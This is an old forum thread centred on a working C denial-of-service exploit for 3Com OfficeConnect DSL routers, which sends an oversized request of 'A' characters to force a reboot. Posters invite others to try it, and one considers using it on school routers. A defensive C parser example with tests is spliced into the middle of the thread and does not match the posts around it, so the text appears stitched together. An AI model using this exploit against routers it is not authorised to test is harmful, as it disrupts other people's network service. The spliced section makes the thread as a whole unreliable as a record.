GaLiaRePt
3Com DSL Router Administrative Interface Long Request DoS exploit
Date: 2004-02-25

Author : Shaun Colley <shaunige@yahoo.co.uk>
Download : http://www.security-corporation.com/downlo...loit/3com-DoS.c

CODE
/* 3com-DoS.c
*
* PoC DoS exploit for 3Com OfficeConnect DSL Routers.
* discovered by David F. Madrid.
*
* Successful exploitation of the vulnerability should cause the router to
* reboot. It is not believed that arbitrary code execution is possible -
* check advisory for more information.
*
* -shaun2k2
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>     /* sleep, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
    int sock;
    char explbuf[521];          /* 512 x 'A' + 8 newlines + NUL terminator */
    struct sockaddr_in dest;
    struct hostent *he;

    if(argc < 3) {
        printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");
        printf("Usage: 3comDoS <3com_router> <port>\n");
        exit(-1);
    }

    if((he = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve %s!\n", argv[1]);
        exit(-1);
    }

    if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket()");
        exit(-1);
    }

    printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");

    memset(&dest, 0, sizeof(dest));
    dest.sin_addr = *((struct in_addr *)he->h_addr);
    dest.sin_port = htons(atoi(argv[2]));
    dest.sin_family = AF_INET;

    printf("[+] Crafting exploit buffer.\n");
    memset(explbuf, 'A', 512);
    memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);
    explbuf[520] = '\0';        /* terminate so strlen() below is defined */

    if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
        perror("connect()");
        exit(-1);
    }

    printf("[+] Connected...Sending exploit buffer!\n");
    send(sock, explbuf, strlen(explbuf), 0);
    sleep(2);
    close(sock);
    printf("\n[+] Exploit buffer sent!\n");
    return(0);
}



Some good stuff on Sec Corp today :-)
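The underlying weakness the PoC above exercises is an administrative interface that reads a request line without bounding its length. The following is an added example, not part of this thread or of 3Com's firmware, showing the defensive pattern a device-side HTTP parser should use: a reader that caps the request line at an assumed limit (MAX_LINE, chosen here for illustration) and refuses overlong input instead of copying it into a fixed buffer. The sample inputs, including one shaped like the 512-byte run of 'A' plus newlines the PoC sends, are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed per-line cap for the example; real firmware picks its own limit. */
#define MAX_LINE 256

enum line_status { LINE_OK = 0, LINE_TOO_LONG = 1, LINE_INCOMPLETE = 2 };

/*
 * Copy one '\n'-terminated line from src (len bytes) into dst (dstsz bytes),
 * reading at most MAX_LINE + 1 bytes and never writing past dst. A trailing
 * '\r' is stripped. Returns LINE_OK (bytes consumed stored in *consumed),
 * LINE_TOO_LONG if no newline appears within the cap, or LINE_INCOMPLETE if
 * src ends first (the caller should read more, still subject to the cap).
 */
int read_request_line(const char *src, size_t len,
                      char *dst, size_t dstsz, size_t *consumed)
{
    size_t cap, i;

    if (dstsz == 0)
        return LINE_TOO_LONG;
    cap = (dstsz - 1 < MAX_LINE) ? dstsz - 1 : MAX_LINE;

    for (i = 0; i < len && i <= cap; i++) {
        if (src[i] == '\n') {
            memcpy(dst, src, i);
            dst[i] = '\0';
            if (i > 0 && dst[i - 1] == '\r')
                dst[i - 1] = '\0';
            *consumed = i + 1;
            return LINE_OK;
        }
    }
    return (i > cap) ? LINE_TOO_LONG : LINE_INCOMPLETE;
}

/* Constructed ordinary request line: accepted and copied intact. */
int check_normal_sample(void)
{
    const char req[] = "GET /admin HTTP/1.0\r\n";
    char out[64];
    size_t used = 0;
    int st = read_request_line(req, sizeof req - 1, out, sizeof out, &used);
    return st == LINE_OK && strcmp(out, "GET /admin HTTP/1.0") == 0
           && used == sizeof req - 1;
}

/* Constructed oversized sample with the same shape as the PoC payload
 * (512 x 'A' then newlines). The bounded reader rejects it rather than
 * copying 512 bytes into a 128-byte destination. */
int check_oversized_sample(void)
{
    char sample[520];
    char out[128];
    size_t used = 0;
    memset(sample, 'A', 512);
    memcpy(sample + 512, "\n\n\n\n\n\n\n\n", 8);
    return read_request_line(sample, sizeof sample, out, sizeof out, &used);
}

/* Constructed partial read: no newline yet, but still under the cap. */
int check_incomplete_sample(void)
{
    char out[64];
    size_t used = 0;
    return read_request_line("GET /adm", 8, out, sizeof out, &used);
}

int main(void)
{
    printf("normal line accepted: %s\n", check_normal_sample() ? "yes" : "no");
    printf("oversized line status: %d (1 = too long)\n", check_oversized_sample());
    printf("partial line status: %d (2 = incomplete)\n", check_incomplete_sample());
    return 0;
}
```

The important design point is that the cap is enforced while scanning, before any copy happens, so the destination size and the scan limit cannot drift apart; a parser that first reads "until newline" and only then checks the length has already lost.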
shaun2k2
Hehe, I wrote that exploit :). Please note, although I wrote the exploit for the router DoS vulnerability, I did not discover it. That was the work of David F. Madrid, as I wrote in the program comments :).

If anybody wants to test this out on their router, that would be great, as I'm curious about the exact impact. Apparently, my exploit should reboot the router.


-Shaun2k2.
zero-maitimax
Well, I wanna try it... we have 3Com at school so...

but I'm not so happy with DoS exploits...
shaun2k2
Hmm, trying that at school could get you kicked out...you don't want to try that at school, it might cost you your placement. Just to be safe, "I do not take responsibility for this code".

Well, you might not like DoS exploits so much, but administrators responsible for this brand of router may wish to test the vulnerability. Remote code execution is not possible via this vulnerability...


-Shaun.
Axl
QUOTE (shaun2k2 @ Feb 26 2004, 04:18 PM)
Hmm, trying that at school could get you kicked out...you don't want to try that at school, it might cost you your placement. Just to be safe, "I do not take responsibility for this code".

Well, you might not like DoS exploits so much, but administrators responsible for this brand of router may wish to test the vulnerability. Remote code execution is not possible via this vulnerability...


-Shaun.

well no shit sherlock... I mean (filtered) it's a damn router not software... Although, hmm it perhaps could be possible to change the router firmware and stuff to log outgoing data and shit...
R0x0r
One of my friends has that router.. I'll try it out.. Is there any patch or something to fix that hole?
Axl
QUOTE (R0x0r @ Mar 2 2004, 05:01 PM)
One of my friends has that router.. I'll try it out.. Is there any patch or something to fix that hole?

Well evidently it isn't as easy as releasing a simple patch. I reckon that you will need to flash the firmware in order to fix this vulnerability... 3Com should be doing that soon. Your ISP can update your firmware though as soon as they obtain the updated firmware package. Or, of course, you can do it yourself :D
alkausar
DoS exploit... hegggghhhhh
shaun2k2
QUOTE

well no shit sherlock... I mean (filtered) it's a damn router not software... Although, hmm it perhaps could be possible to change the router firmware and stuff to log outgoing data and shit...

What the (filtered) are you talking about? I don't understand why you quoted my post. Care to explain?


-Shaun.